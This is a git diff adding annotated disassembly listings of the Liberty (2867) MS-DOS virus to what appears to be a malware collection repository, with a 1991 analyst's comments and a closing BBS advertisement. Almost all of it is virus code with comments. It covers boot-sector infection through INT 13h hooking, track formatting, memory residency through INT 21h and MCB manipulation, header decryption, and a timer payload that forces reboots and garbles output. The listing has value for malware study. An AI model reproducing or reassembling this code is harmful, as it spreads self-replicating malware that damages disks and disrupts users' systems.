+CS:06BF B90100 MOV CX,0001 +CS:06C2 33D2 XOR DX,DX +CS:06C4 CD13 INT 13 +CS:06C6 EBE5 JMP 06AD +CS:06C9 33C0 XOR AX,AX +CS:06CB 8EC0 MOV ES,AX +CS:06CD B80102 MOV AX,0201 +CS:06D0 BB007C MOV BX,7C00 +CS:06D3 B93F28 MOV CX,283F +CS:06D6 33D2 XOR DX,DX +CS:06D8 CD13 INT 13 +CS:06DA C3 RET +CS:06DB 33C0 XOR AX,AX +CS:06DD 8ED8 MOV DS,AX +CS:06DF A14C00 MOV AX,[004C] +CS:06E2 2E CS: +CS:06E3 A31608 MOV [0816],AX +CS:06E6 A14E00 MOV AX,[004E] +CS:06E9 2E CS: +CS:06EA A31808 MOV [0818],AX +CS:06ED FA CLI +CS:06EE B8FB07 MOV AX,07FB +CS:06F1 A34C00 MOV [004C],AX +CS:06F4 8C0E4E00 MOV [004E],CS +CS:06F8 C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:06F9 9C PUSHF +CS:06FA 80FC01 CMP AH,01 +CS:06FD 7E13 JLE 0712 +CS:06FF 80FC04 CMP AH,04 +CS:0702 7D0E JGE 0712 +CS:0704 80FA80 CMP DL,80 +CS:0707 720F JB 0718 +CS:0709 E8BE00 CALL 07CA ; Disconnect vector 13h +CS:070C 07 POP ES +CS:070D 1F POP DS +CS:070E 5A POP DX +CS:070F 59 POP CX +CS:0710 5B POP BX +CS:0711 58 POP AX +CS:0712 9D POPF +CS:0713 EA00000000 JMP 0000:0000 +CS:0718 50 PUSH AX +CS:0719 53 PUSH BX +CS:071A 51 PUSH CX +CS:071B 52 PUSH DX +CS:071C 1E PUSH DS +CS:071D 06 PUSH ES +CS:071E B80102 MOV AX,0201 ; +CS:0721 0E PUSH CS ; +CS:0722 07 POP ES ; +CS:0723 0E PUSH CS ; +CS:0724 1F POP DS ; +CS:0725 BB420C MOV BX,0C42 ; +CS:0728 B90100 MOV CX,0001 ; +CS:072B 32F6 XOR DH,DH ; +CS:072D 9C PUSHF ; +CS:072E 2E CS: ; +CS:072F FF1E1407 CALL FAR [0714] ; Read Bootsector +CS:0733 72D4 JB 0709 +CS:0735 0E PUSH CS +CS:0736 1F POP DS +CS:0737 0E PUSH CS +CS:0738 07 POP ES +CS:0739 BE420C MOV SI,0C42 ; +CS:073C BF3506 MOV DI,0635 ; +CS:073F B90A00 MOV CX,000A ; +CS:0742 FC CLD ; +CS:0743 F3 REPZ ; +CS:0744 A7 CMPSW ; Check infection +CS:0745 74C2 JZ 0709 +CS:0747 BE420C MOV SI,0C42 +CS:074A 807C02FF CMP BYTE PTR [SI+02],FF ; Was infected ? +CS:074E 744A JZ 079A +CS:0750 B0FF MOV AL,FF +CS:0752 884402 MOV [SI+02],AL +CS:0755 B80905 MOV AX,0509 ; +CS:0758 BBA607 MOV BX,07A6 ; +CS:075B B93128 MOV CX,2831 ; +CS:075E 9C PUSHF ; +CS:075F 2E CS: ; +CS:0760 FF1E1407 CALL FAR [0714] ; Format track 40 +CS:0764 72A3 JB 0709 +CS:0766 B80103 MOV AX,0301 ; +CS:0769 BB420C MOV BX,0C42 ; +CS:076C B93F28 MOV CX,283F ; +CS:076F 9C PUSHF ; +CS:0770 2E CS: ; +CS:0771 FF1E1407 CALL FAR [0714] ; Write original bootsector +CS:0775 7292 JB 0709 +CS:0777 B80103 MOV AX,0301 ; +CS:077A BB3506 MOV BX,0635 ; +CS:077D B90100 MOV CX,0001 ; +CS:0780 9C PUSHF ; +CS:0781 2E CS: ; +CS:0782 FF1E1407 CALL FAR [0714] ; Write Libery bootsector +CS:0786 7281 JB 0709 +CS:0788 B80803 MOV AX,0308 ; +CS:078B BB1001 MOV BX,0110 ; +CS:078E B93128 MOV CX,2831 ; +CS:0791 9C PUSHF ; +CS:0792 2E CS: ; +CS:0793 FF1E1407 CALL FAR [0714] ; Write Liberty virus +CS:0797 E96FFF JMP 0709 +CS:079A 2E CS: ; +CS:079B C606100300 MOV BYTE PTR [0310],00 ; +CS:07A0 E83B00 CALL 07DE ; Attach ??? +CS:07A3 E963FF JMP 0709 +; +; The format table is next +; +DS:07A0 28 00-31 02 28 00 32 02 28 00 +DS:07B0 33 02 28 00 34 02 28 00-35 02 28 00 36 02 28 00 +DS:07C0 37 02 28 00 38 02 28 00-3F 02 +; +; Revectoring +; +CS:07CA 33C0 XOR AX,AX +CS:07CC 8ED8 MOV DS,AX +CS:07CE FA CLI +CS:07CF 2E CS: +CS:07D0 A11407 MOV AX,[0714] +CS:07D3 A34C00 MOV [004C],AX +CS:07D6 2E CS: +CS:07D7 A11607 MOV AX,[0716] +CS:07DA A34E00 MOV [004E],AX +CS:07DD C3 RET +CS:07DE 2E CS: +CS:07DF A11407 MOV AX,[0714] +CS:07E2 2E CS: +CS:07E3 A30C03 MOV [030C],AX +CS:07E6 2E CS: +CS:07E7 A11607 MOV AX,[0716] +CS:07EA 2E CS: +CS:07EB A30E03 MOV [030E],AX +CS:07EE B8F702 MOV AX,02F7 +CS:07F1 2E CS: +CS:07F2 A31407 MOV [0714],AX +CS:07F5 2E CS: +CS:07F6 8C0E1607 MOV [0716],CS +CS:07FA C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:07FB 9C PUSHF +CS:07FC 80FC03 CMP AH,03 +CS:07FF 7213 JB 0814 +CS:0801 80FC05 CMP AH,05 +CS:0804 730E JNB 0814 +CS:0806 80FA80 CMP DL,80 +CS:0809 720F JB 081A +CS:080B EB07 JMP 0814 +CS:080D 90 NOP +CS:080E 07 POP ES +CS:080F 1F POP DS +CS:0810 5A POP DX +CS:0811 59 POP CX +CS:0812 5B POP BX +CS:0813 58 POP AX +CS:0814 9D POPF +CS:0815 EA00000000 JMP 0000:0000 +CS:081A 50 PUSH AX +CS:081B 53 PUSH BX +CS:081C 51 PUSH CX +CS:081D 52 PUSH DX +CS:081E 1E PUSH DS +CS:081F 06 PUSH ES +CS:0820 2E CS: +CS:0821 803E0C0401 CMP BYTE PTR [040C],01 +CS:0826 74E6 JZ 080E +CS:0828 B80102 MOV AX,0201 ; +CS:082B 0E PUSH CS ; +CS:082C 07 POP ES ; +CS:082D 0E PUSH CS ; +CS:082E 1F POP DS ; +CS:082F BB420C MOV BX,0C42 ; +CS:0832 B90100 MOV CX,0001 ; +CS:0835 32F6 XOR DH,DH ; +CS:0837 9C PUSHF ; +CS:0838 2E CS: ; +CS:0839 FF1E1608 CALL FAR [0816] ; Read bootsector +CS:083D 72CF JB 080E +CS:083F 0E PUSH CS +CS:0840 1F POP DS +CS:0841 0E PUSH CS +CS:0842 07 POP ES +CS:0843 BE420C MOV SI,0C42 ; +CS:0846 BF3506 MOV DI,0635 ; +CS:0849 B90A00 MOV CX,000A ; +CS:084C FC CLD ; +CS:084D F3 REPZ ; +CS:084E A7 CMPSW ; Check infection +CS:084F 74BD JZ 080E +CS:0851 B0FF MOV AL,FF +CS:0853 884702 MOV [BX+02],AL +CS:0856 B80905 MOV AX,0509 ; +CS:0859 BBA607 MOV BX,07A6 ; +CS:085C B93128 MOV CX,2831 ; +CS:085F 9C PUSHF ; +CS:0860 2E CS: ; +CS:0861 FF1E1608 CALL FAR [0816] ; Format track 28 +CS:0865 72A7 JB 080E +CS:0867 B80103 MOV AX,0301 ; +CS:086A BB420C MOV BX,0C42 ; +CS:086D B93F28 MOV CX,283F ; +CS:0870 9C PUSHF ; +CS:0871 2E CS: ; +CS:0872 FF1E1608 CALL FAR [0816] ; Write original bootsector +CS:0876 7296 JB 080E +CS:0878 B80103 MOV AX,0301 ; +CS:087B BB3506 MOV BX,0635 ; +CS:087E B90100 MOV CX,0001 ; +CS:0881 9C PUSHF ; +CS:0882 2E CS: ; +CS:0883 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0887 7285 JB 080E +CS:0889 B80803 MOV AX,0308 ; +CS:088C BB1001 MOV BX,0110 ; +CS:088F B93128 MOV CX,2831 ; +CS:0892 9C PUSHF ; +CS:0893 2E CS: ; +CS:0894 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0898 E973FF JMP 080E +CS:089B 9C PUSHF +CS:089C 50 PUSH AX +CS:089D 1E PUSH DS +CS:089E 33C0 XOR AX,AX +CS:08A0 8ED8 MOV DS,AX +CS:08A2 833E860000 CMP WORD PTR [0086],+00 ; +CS:08A7 750F JNZ 08B8 ; Check if DOS is installed +CS:08A9 833E840000 CMP WORD PTR [0084],+00 ; +CS:08AE 7508 JNZ 08B8 +CS:08B0 1F POP DS +CS:08B1 58 POP AX +CS:08B2 9D POPF +CS:08B3 EA00000000 JMP 0000:0000 +CS:08B8 06 PUSH ES +CS:08B9 0E PUSH CS +CS:08BA 07 POP ES +CS:08BB E8C3F9 CALL 0281 ; Get vector 21h +CS:08BE E8F1F9 CALL 02B2 ; Set vector 21h +CS:08C1 E82000 CALL 08E4 ; Disconnect vector 8h +CS:08C4 E8FBF9 CALL 02C2 ; Set installation flag +CS:08C7 07 POP ES +CS:08C8 EBE6 JMP 08B0 +; +; Revectoring +; +CS:08CA A12000 MOV AX,[0020] +CS:08CD 2E CS: +CS:08CE A3B408 MOV [08B4],AX +CS:08D1 A12200 MOV AX,[0022] +CS:08D4 2E CS: +CS:08D5 A3B608 MOV [08B6],AX +CS:08D8 B89B08 MOV AX,089B +CS:08DB FA CLI +CS:08DC A32000 MOV [0020],AX +CS:08DF 8C0E2200 MOV [0022],CS +CS:08E3 C3 RET +CS:08E4 33C0 XOR AX,AX +CS:08E6 8ED8 MOV DS,AX +CS:08E8 FA CLI +CS:08E9 2E CS: +CS:08EA A1B408 MOV AX,[08B4] +CS:08ED A32000 MOV [0020],AX +CS:08F0 2E CS: +CS:08F1 A1B608 MOV AX,[08B6] +CS:08F4 A32200 MOV [0022],AX +CS:08F7 C3 RET +CS:08F8 A17000 MOV AX,[0070] +CS:08FB 2E CS: +CS:08FC A3900A MOV [0A90],AX +CS:08FF A17200 MOV AX,[0072] +CS:0902 2E CS: +CS:0903 A3920A MOV [0A92],AX +CS:0906 B8580A MOV AX,0A58 +CS:0909 FA CLI +CS:090A A37000 MOV [0070],AX +CS:090D 8C0E7200 MOV [0072],CS +CS:0911 C3 RET +; +; The next routine displays 'M A G I C ! !' on the screen for a second +; +CS:0912 50 PUSH AX +CS:0913 53 PUSH BX +CS:0914 51 PUSH CX +CS:0915 52 PUSH DX +CS:0916 56 PUSH SI +CS:0917 57 PUSH DI +CS:0918 1E PUSH DS +CS:0919 06 PUSH ES +CS:091A 9C PUSHF +CS:091B BB00B8 MOV BX,B800 ; +CS:091E 8EDB MOV DS,BX ; +CS:0920 0E PUSH CS ; +CS:0921 07 POP ES ; +CS:0922 33F6 XOR SI,SI ; +CS:0924 BF6809 MOV DI,0968 ; +CS:0927 B9A000 MOV CX,00A0 ; +CS:092A F3 REPZ ; +CS:092B A4 MOVSB ; Save screen +CS:092C BB00B8 MOV BX,B800 ; +CS:092F 8EC3 MOV ES,BX ; +CS:0931 0E PUSH CS ; +CS:0932 1F POP DS ; +CS:0933 33FF XOR DI,DI ; +CS:0935 BB080A MOV BX,0A08 ; +CS:0938 B95000 MOV CX,0050 ; +CS:093B B6CE MOV DH,CE ; +CS:093D 8A17 MOV DL,[BX] ; +CS:093F 80EA03 SUB DL,03 ; +CS:0942 26 ES: ; +CS:0943 8915 MOV [DI],DX ; +CS:0945 47 INC DI ; +CS:0946 47 INC DI ; +CS:0947 43 INC BX ; +CS:0948 E2F3 LOOP 093D ; Put text on screen +CS:094A E2FE LOOP 094A ; Wait +CS:094C BB00B8 MOV BX,B800 ; +CS:094F 8EC3 MOV ES,BX ; +CS:0951 0E PUSH CS ; +CS:0952 1F POP DS ; +CS:0953 33FF XOR DI,DI ; +CS:0955 BE6809 MOV SI,0968 ; +CS:0958 B9A000 MOV CX,00A0 ; +CS:095B F3 REPZ ; +CS:095C A4 MOVSB ; Restore screen +CS:095D 9D POPF +CS:095E 07 POP ES +CS:095F 1F POP DS +CS:0960 5F POP DI +CS:0961 5E POP SI +CS:0962 5A POP DX +CS:0963 59 POP CX +CS:0964 5B POP BX +CS:0965 58 POP AX +CS:0966 C3 RET +; +; A temporary screen buffer +; +DS:0960 4D 41 47 49 43 4D 41 47 +DS:0970 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:0980 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:0990 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09A0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:09B0 47 49 43 4D 41 47 49 43-4D 41 47 49 43 4D 41 47 +DS:09C0 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:09D0 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:09E0 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09F0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:0A00 47 49 43 4D 41 47 49 43 +; +; The encrypted text 'M A G I C ! !' +; +DS:0A00 23 23 23 23 23 23 23 23 +DS:0A10 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A20 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A30 23 23 23 23 23 23 23 23-23 23 50 23 44 23 4A 23 +DS:0A40 4C 23 46 23 23 24 23 24-23 24 23 23 23 23 23 23 +DS:0A50 23 23 23 23 23 23 23 23 +; +; The next routine is the timer routine. It activates all the gadgets. +; +CS:0A58 9C PUSHF +CS:0A59 50 PUSH AX +CS:0A5A 1E PUSH DS +CS:0A5B 2E CS: +CS:0A5C FF06940A INC WORD PTR [0A94] +CS:0A60 2E CS: +CS:0A61 833E960A0B CMP WORD PTR [0A96],+0B ; Time for a reboot ? +CS:0A66 7433 JZ 0A9B +CS:0A68 2E CS: +CS:0A69 A1980A MOV AX,[0A98] +CS:0A6C 2E CS: +CS:0A6D 3906940A CMP [0A94],AX ; Time for gadgets on ? +CS:0A71 7430 JZ 0AA3 +CS:0A73 7217 JB 0A8C +CS:0A75 050002 ADD AX,0200 +CS:0A78 2E CS: +CS:0A79 3906940A CMP [0A94],AX ; Time for gadgets off ? +CS:0A7D 7446 JZ 0AC5 +CS:0A7F 770B JA 0A8C +CS:0A81 2E CS: +CS:0A82 833E960A0A CMP WORD PTR [0A96],+0A ; Time for screen messing ? +CS:0A87 7503 JNZ 0A8C +CS:0A89 E886FE CALL 0912 ; Mess up screen +CS:0A8C 1F POP DS +CS:0A8D 58 POP AX +CS:0A8E 9D POPF +CS:0A8F EA00000000 JMP 0000:0000 ; Continue +CS:0A9B B8FFFF MOV AX,FFFF +CS:0A9E 50 PUSH AX +CS:0A9F 33C0 XOR AX,AX +CS:0AA1 50 PUSH AX +CS:0AA2 CB RETF +CS:0AA3 2E CS: +CS:0AA4 812E980A5001 SUB WORD PTR [0A98],0150 +CS:0AAA 33C0 XOR AX,AX +CS:0AAC 8ED8 MOV DS,AX +CS:0AAE 2E CS: +CS:0AAF C606470B00 MOV BYTE PTR [0B47],00 +CS:0AB4 90 NOP +CS:0AB5 2E CS: +CS:0AB6 C606950B00 MOV BYTE PTR [0B95],00 +CS:0ABB 90 NOP +CS:0ABC 2E CS: +CS:0ABD C606080C00 MOV BYTE PTR [0C08],00 +CS:0AC2 90 NOP +CS:0AC3 EBC7 JMP 0A8C +CS:0AC5 2E CS: +CS:0AC6 C606470BFF MOV BYTE PTR [0B47],FF +CS:0ACB 90 NOP +CS:0ACC 2E CS: +CS:0ACD C606950BFF MOV BYTE PTR [0B95],FF +CS:0AD2 90 NOP +CS:0AD3 2E CS: +CS:0AD4 C606080CFF MOV BYTE PTR [0C08],FF +CS:0AD9 90 NOP +CS:0ADA 2E CS: +CS:0ADB C706940A0000 MOV WORD PTR [0A94],0000 +CS:0AE1 2E CS: +CS:0AE2 FF06960A INC WORD PTR [0A96] +CS:0AE6 EBA4 JMP 0A8C +CS:0AE8 A14000 MOV AX,[0040] +CS:0AEB 2E CS: +CS:0AEC A3430B MOV [0B43],AX +CS:0AEF A14200 MOV AX,[0042] +CS:0AF2 2E CS: +CS:0AF3 A3450B MOV [0B45],AX +CS:0AF6 B8360B MOV AX,0B36 +CS:0AF9 FA CLI +CS:0AFA A34000 MOV [0040],AX +CS:0AFD 8C0E4200 MOV [0042],CS +CS:0B01 C3 RET +CS:0B02 FA CLI +CS:0B03 A15000 MOV AX,[0050] +CS:0B06 2E CS: +CS:0B07 A3910B MOV [0B91],AX +CS:0B0A A15200 MOV AX,[0052] +CS:0B0D 2E CS: +CS:0B0E A3930B MOV [0B93],AX +CS:0B11 B8840B MOV AX,0B84 +CS:0B14 A35000 MOV [0050],AX +CS:0B17 8C0E5200 MOV [0052],CS +CS:0B1B C3 RET +CS:0B1C FA CLI +CS:0B1D A15C00 MOV AX,[005C] +CS:0B20 2E CS: +CS:0B21 A3040C MOV [0C04],AX +CS:0B24 A15E00 MOV AX,[005E] +CS:0B27 2E CS: +CS:0B28 A3060C MOV [0C06],AX +CS:0B2B B8FC0B MOV AX,0BFC +CS:0B2E A35C00 MOV [005C],AX +CS:0B31 8C0E5E00 MOV [005E],CS +CS:0B35 C3 RET +; +; Now the gadgets' routines. When activated, only the word MAGIC!! will be +; sent to screen, port, and printer. +; +CS:0B36 9C PUSHF ; Screen +CS:0B37 80FC09 CMP AH,09 +CS:0B3A 740F JZ 0B4B +CS:0B3C 80FC0A CMP AH,0A +CS:0B3F 740A JZ 0B4B +CS:0B41 9D POPF +CS:0B42 EA00000000 JMP 0000:0000 +CS:0B4B 2E CS: +CS:0B4C 803E470BFF CMP BYTE PTR [0B47],FF +CS:0B51 74EE JZ 0B41 +CS:0B53 53 PUSH BX +CS:0B54 56 PUSH SI +CS:0B55 50 PUSH AX +CS:0B56 33DB XOR BX,BX +CS:0B58 2E CS: +CS:0B59 833E480B07 CMP WORD PTR [0B48],+07 +CS:0B5E 7507 JNZ 0B67 +CS:0B60 2E CS: +CS:0B61 C706480B0000 MOV WORD PTR [0B48],0000 +CS:0B67 2E CS: +CS:0B68 8B1E480B MOV BX,[0B48] +CS:0B6C 2E CS: +CS:0B6D 8B3E480B MOV DI,[0B48] +CS:0B71 47 INC DI +CS:0B72 2E CS: +CS:0B73 893E480B MOV [0B48],DI +CS:0B77 BE3B0C MOV SI,0C3B +CS:0B7A 58 POP AX +CS:0B7B 2E CS: +CS:0B7C 8A00 MOV AL,[BX+SI] +CS:0B7E FEC0 INC AL +CS:0B80 5E POP SI +CS:0B81 5B POP BX +CS:0B82 EBBD JMP 0B41 +CS:0B84 9C PUSHF ; Port +CS:0B85 80FC01 CMP AH,01 +CS:0B88 740D JZ 0B97 +CS:0B8A 80FC02 CMP AH,02 +CS:0B8D 7436 JZ 0BC5 +CS:0B8F 9D POPF +CS:0B90 EA00000000 JMP 0000:0000 +CS:0B97 2E CS: +CS:0B98 803E950BFF CMP BYTE PTR [0B95],FF +CS:0B9D 74F0 JZ 0B8F +CS:0B9F 53 PUSH BX +CS:0BA0 56 PUSH SI +CS:0BA1 33DB XOR BX,BX +CS:0BA3 2E CS: +CS:0BA4 8A1E960B MOV BL,[0B96] +CS:0BA8 BE3B0C MOV SI,0C3B +CS:0BAB 2E CS: +CS:0BAC 8A00 MOV AL,[BX+SI] +CS:0BAE 2E CS: +CS:0BAF FE06960B INC BYTE PTR [0B96] +CS:0BB3 2E CS: +CS:0BB4 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BB9 7506 JNZ 0BC1 +CS:0BBB 2E CS: +CS:0BBC C606960B00 MOV BYTE PTR [0B96],00 +CS:0BC1 5E POP SI +CS:0BC2 5B POP BX +CS:0BC3 EBCA JMP 0B8F +CS:0BC5 2E CS: +CS:0BC6 803E950BFF CMP BYTE PTR [0B95],FF +CS:0BCB 74C2 JZ 0B8F +CS:0BCD 2E CS: +CS:0BCE FF1E910B CALL FAR [0B91] +CS:0BD2 80FC00 CMP AH,00 +CS:0BD5 7F24 JG 0BFB +CS:0BD7 53 PUSH BX +CS:0BD8 56 PUSH SI +CS:0BD9 33DB XOR BX,BX +CS:0BDB 2E CS: +CS:0BDC 8A1E960B MOV BL,[0B96] +CS:0BE0 BE3B0C MOV SI,0C3B +CS:0BE3 2E CS: +CS:0BE4 8A00 MOV AL,[BX+SI] +CS:0BE6 2E CS: +CS:0BE7 FE06960B INC BYTE PTR [0B96] +CS:0BEB 2E CS: +CS:0BEC 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BF1 7506 JNZ 0BF9 +CS:0BF3 2E CS: +CS:0BF4 C606960B00 MOV BYTE PTR [0B96],00 +CS:0BF9 5E POP SI +CS:0BFA 5B POP BX +CS:0BFB CF IRET +CS:0BFC 9C PUSHF ; Printer +CS:0BFD 80FC00 CMP AH,00 +CS:0C00 7407 JZ 0C09 +CS:0C02 9D POPF +CS:0C03 EA00000000 JMP 0000:0000 +CS:0C09 2E CS: +CS:0C0A 803E080CFF CMP BYTE PTR [0C08],FF +CS:0C0F 74F1 JZ 0C02 +CS:0C11 53 PUSH BX +CS:0C12 56 PUSH SI +CS:0C13 33DB XOR BX,BX +CS:0C15 2E CS: +CS:0C16 8A1E3A0C MOV BL,[0C3A] +CS:0C1A BE3B0C MOV SI,0C3B +CS:0C1D 2E CS: +CS:0C1E 8A00 MOV AL,[BX+SI] +CS:0C20 FEC0 INC AL +CS:0C22 2E CS: +CS:0C23 FE063A0C INC BYTE PTR [0C3A] +CS:0C27 2E CS: +CS:0C28 803E3A0C07 CMP BYTE PTR [0C3A],07 +CS:0C2D 7507 JNZ 0C36 +CS:0C2F 2E CS: +CS:0C30 C6063A0C00 MOV BYTE PTR [0C3A],00 +CS:0C35 90 NOP +CS:0C36 5E POP SI +CS:0C37 5B POP BX +CS:0C38 EBC8 JMP 0C02 +; +; The encrypted text 'MAGIC!!' +; +DS:0C3A 4C 40 46 48 42 20 20 +; +; Important note: +; When there is no longer space on the disk to infect a file, the Liberty +; virus will infect the bootsector. This is done in the 'OHIO' way. +; +; +; +; End of Liberty (2867) disassembly. (c) 1991 by Remco van Helvoort. +; This document may be freely shared. If you have any comments or some +; nice little viruses for analysis, feel free to drop me a note. +; +; Remco van Helvoort +; Bredastraat 3 +; 5224 VD 's-Hertogenbosch +; Holland +; + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + diff --git a/MSDOS/Virus.MSDOS.Unknown.libertyb.lst b/MSDOS/Virus.MSDOS.Unknown.libertyb.lst new file mode 100644 index 00000000..ad39d293 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.libertyb.lst @@ -0,0 +1,1194 @@ +CS:0110 EB79 JMP 018B +CS:0112 90 NOP +; +; The program's original infomation is stored between these sections +; +CS:018B 2E CS: +CS:018C 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? +CS:0191 7403 JZ 0196 +CS:0193 1F POP DS +CS:0194 59 POP CX +CS:0195 5B POP BX +CS:0196 50 PUSH AX +CS:0197 53 PUSH BX +CS:0198 51 PUSH CX +CS:0199 52 PUSH DX +CS:019A 1E PUSH DS +CS:019B 06 PUSH ES +CS:019C 1E PUSH DS +CS:019D 0E PUSH CS +CS:019E 1F POP DS +CS:019F E8CD00 CALL 026F ; Installation check +CS:01A2 3DFFFF CMP AX,FFFF +CS:01A5 741A JZ 01C1 +CS:01A7 E8D700 CALL 0281 ; Get vector 21h +CS:01AA 07 POP ES +CS:01AB 06 PUSH ES +CS:01AC 8CC0 MOV AX,ES +CS:01AE 48 DEC AX +CS:01AF 8ED8 MOV DS,AX +CS:01B1 E8DC00 CALL 0290 ; Adjust MCB +CS:01B4 8EC0 MOV ES,AX +CS:01B6 0E PUSH CS +CS:01B7 1F POP DS +CS:01B8 E8EC00 CALL 02A7 ; Move to Upper Memory +CS:01BB E8F400 CALL 02B2 ; Set vector 21h +CS:01BE E80101 CALL 02C2 ; Set installation flag +CS:01C1 2E CS: +CS:01C2 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? +CS:01C7 7417 JZ 01E0 +CS:01C9 07 POP ES +CS:01CA 0E PUSH CS +CS:01CB 1F POP DS +CS:01CC E80901 CALL 02D8 ; Decrypt header +CS:01CF E81901 CALL 02EB ; Restore header +CS:01D2 07 POP ES +CS:01D3 1F POP DS +CS:01D4 5A POP DX +CS:01D5 59 POP CX +CS:01D6 5B POP BX +CS:01D7 58 POP AX +CS:01D8 1E PUSH DS +CS:01D9 BF0001 MOV DI,0100 +CS:01DC 57 PUSH DI +CS:01DD 33FF XOR DI,DI +CS:01DF CB RETF ; Start file +CS:01E0 FA CLI +CS:01E1 5E POP SI +CS:01E2 07 POP ES +CS:01E3 1F POP DS +CS:01E4 5A POP DX +CS:01E5 59 POP CX +CS:01E6 5B POP BX +CS:01E7 58 POP AX +CS:01E8 2E CS: +CS:01E9 8B3E2C06 MOV DI,[062C] +CS:01ED 03FE ADD DI,SI +CS:01EF 8ED7 MOV SS,DI +CS:01F1 2E CS: +CS:01F2 8B3E2E06 MOV DI,[062E] +CS:01F6 8BE7 MOV SP,DI ; Restore stack +CS:01F8 2E CS: +CS:01F9 8B3E2806 MOV DI,[0628] +CS:01FD 03FE ADD DI,SI +CS:01FF 57 PUSH DI +CS:0200 2E CS: +CS:0201 FF362A06 PUSH [062A] +CS:0205 33F6 XOR SI,SI +CS:0207 EBD4 JMP 01DD ; Start file +; +; The encrypted Liberty header for .COM files +; +DS:0200 1D 69 D9 00 01 01 +DS:0210 80 80 40 40 20 20 10 10-08 08 A4 05 D2 04 C9 02 +DS:0220 4C 81 A8 40 49 20 21 90-0B 48 E8 69 95 05 4A 92 +DS:0230 21 1D 40 A8 43 28 90 14-4E 4C 07 27 D3 22 81 81 +DS:0240 C0 B0 40 C4 79 20 90 29-5C D0 AE 69 57 35 2B 9A +DS:0250 31 CD 34 40 51 53 AE 5D-62 C0 E3 C1 B0 35 58 F6 +DS:0260 46 E5 20 02 +; +; Various subroutines used by the virus +; +CS:026F 2E CS: +CS:0270 8A1E6A02 MOV BL,[026A] +CS:0274 32FF XOR BH,BH +CS:0276 33C0 XOR AX,AX +CS:0278 8ED8 MOV DS,AX +CS:027A D1E3 SHL BX,1 +CS:027C D1E3 SHL BX,1 +CS:027E 8B07 MOV AX,[BX] +CS:0280 C3 RET +CS:0281 A18400 MOV AX,[0084] +CS:0284 2E CS: +CS:0285 A38C03 MOV [038C],AX +CS:0288 A18600 MOV AX,[0086] +CS:028B 2E CS: +CS:028C A38E03 MOV [038E],AX +CS:028F C3 RET +CS:0290 BB4221 MOV BX,2142 +CS:0293 B104 MOV CL,04 +CS:0295 D3EB SHR BX,CL +CS:0297 291E0300 SUB [0003],BX +CS:029B A10300 MOV AX,[0003] +CS:029E 03060100 ADD AX,[0001] +CS:02A2 A31200 MOV [0012],AX +CS:02A5 40 INC AX +CS:02A6 C3 RET +CS:02A7 BF1001 MOV DI,0110 +CS:02AA 8BF7 MOV SI,DI +CS:02AC B99A05 MOV CX,059A +CS:02AF F3 REPZ +CS:02B0 A5 MOVSW +CS:02B1 C3 RET +CS:02B2 33C0 XOR AX,AX +CS:02B4 8ED8 MOV DS,AX +CS:02B6 FA CLI +CS:02B7 B86C03 MOV AX,036C +CS:02BA A38400 MOV [0084],AX +CS:02BD 8C068600 MOV [0086],ES +CS:02C1 C3 RET +CS:02C2 FA CLI +CS:02C3 B8FFFF MOV AX,FFFF +CS:02C6 2E CS: +CS:02C7 8A1E6A02 MOV BL,[026A] +CS:02CB 32FF XOR BH,BH +CS:02CD D1E3 SHL BX,1 +CS:02CF D1E3 SHL BX,1 +CS:02D1 8907 MOV [BX],AX +CS:02D3 40 INC AX +CS:02D4 894702 MOV [BX+02],AX +CS:02D7 C3 RET +CS:02D8 B93C00 MOV CX,003C +CS:02DB BE1301 MOV SI,0113 +CS:02DE 2E CS: +CS:02DF 8B14 MOV DX,[SI] +CS:02E1 D3CA ROR DX,CL +CS:02E3 2E CS: +CS:02E4 8914 MOV [SI],DX +CS:02E6 46 INC SI +CS:02E7 46 INC SI +CS:02E8 E2F4 LOOP 02DE +CS:02EA C3 RET +CS:02EB BF0001 MOV DI,0100 +CS:02EE BE1301 MOV SI,0113 +CS:02F1 B93C00 MOV CX,003C +CS:02F4 F3 REPZ +CS:02F5 A5 MOVSW +CS:02F6 C3 RET +; +; I am not sure what the next routine is supposed to be doing. +; +CS:02F7 9C PUSHF +CS:02F8 2E CS: +CS:02F9 803E100301 CMP BYTE PTR [0310],01 +CS:02FE 740A JZ 030A +CS:0300 80FC03 CMP AH,03 +CS:0303 7505 JNZ 030A +CS:0305 80FA80 CMP DL,80 +CS:0308 7207 JB 0311 +CS:030A 9D POPF +CS:030B EA00000000 JMP 0000:0000 +CS:0311 06 PUSH ES 